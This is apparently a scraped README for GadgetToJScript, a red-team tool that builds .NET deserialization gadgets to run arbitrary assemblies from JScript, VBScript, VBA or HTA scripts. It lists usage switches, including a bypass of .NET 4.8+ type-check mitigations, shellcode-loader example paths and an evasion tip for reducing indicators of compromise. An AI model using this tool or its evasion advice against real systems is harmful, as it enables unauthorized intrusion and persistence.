Home

Awesome

Description

A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA scripts. <br>The current gadget triggers a call to Activator.CreateInstance() when deserialized using BinaryFormatter from jscript/vbscript/vba, this means it can be used to trigger execution of your .NET assembly of choice via the default/public constructor. <br><br>The tool was created mainly for automating WSH scripts weaponization for RT engagements (Initial Access, Lateral Movement, Persistence), the shellcode loader which was used for PoC is removed and replaced by an example assembly implemented in the TestAssembly project.

Details:

Usage & Notes:

You can either use the binaries located in the Release folder or use VS2017 and retarget your project to .NET version 3.5 or 4.x in order to build G2JS from source.

-w, --scriptType=jsSet to js, vbs, vba or hta
-a, --assembly=TestAssembly.dll.NET Assembly, example: -a C:\Users\userX\Desktop\shellcode_loader.dll/exe, alternatively you can specify a c# source file instead using -c cmdline switch.
-c, --csfile=TestAssembly.csC# source code file, example: -c C:\Users\userX\Desktop\shellcode_loader.cs, make sure to place your code within the default constructor of your class and specify any required dependencies using -d cmdline switch.
-d, --references=Example.dllReference Assemblies, example: -d System.Window- s.Forms.dll, System.dll
-b, --bypassBypass type check controls introduced in .NET version 4.8+, by default set to false, set to true (--bypass/-b) in case WSH scripts are being generated to run on .NET version > 4.8+ environments. this option should be used only with .NET 4.x G2JS executable
-e, --encodeType=b64VBA gadgets encoding: b64 or hex (default set to b64)
-o, --output=outputGenerated payload output file, example: -o C:\Users\userX\Desktop\output (Without extension)
-r, --regfreeregistration-free activation of .NET based COM components, applicable to JS/HTA scripts only.
-h, --helpShow Help

OPSEC Tip:

Use the .NET 3.5 version of G2JS to generate WSH Registration-free JScript/HTA scripts which can still bypass .NET framework 4.8+ type checking without having to disable such mitigation using the first TextFormattingRunProperties stage gadget. consider this as a <u>better/cleaner</u> bypass to execute Reg-free JScript/HTA payloads targeting .NET 4.8+ environments as it does not require:

-> less IOCs + targetting 3.5 < .NET < 4.x Envs.

Credits & References

The tool is based on the awesome research/work done by:

Disclaimer

GadgetToJScript should be used for authorized red teaming and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author. Use it at your own networks and/or with the network owner's permission.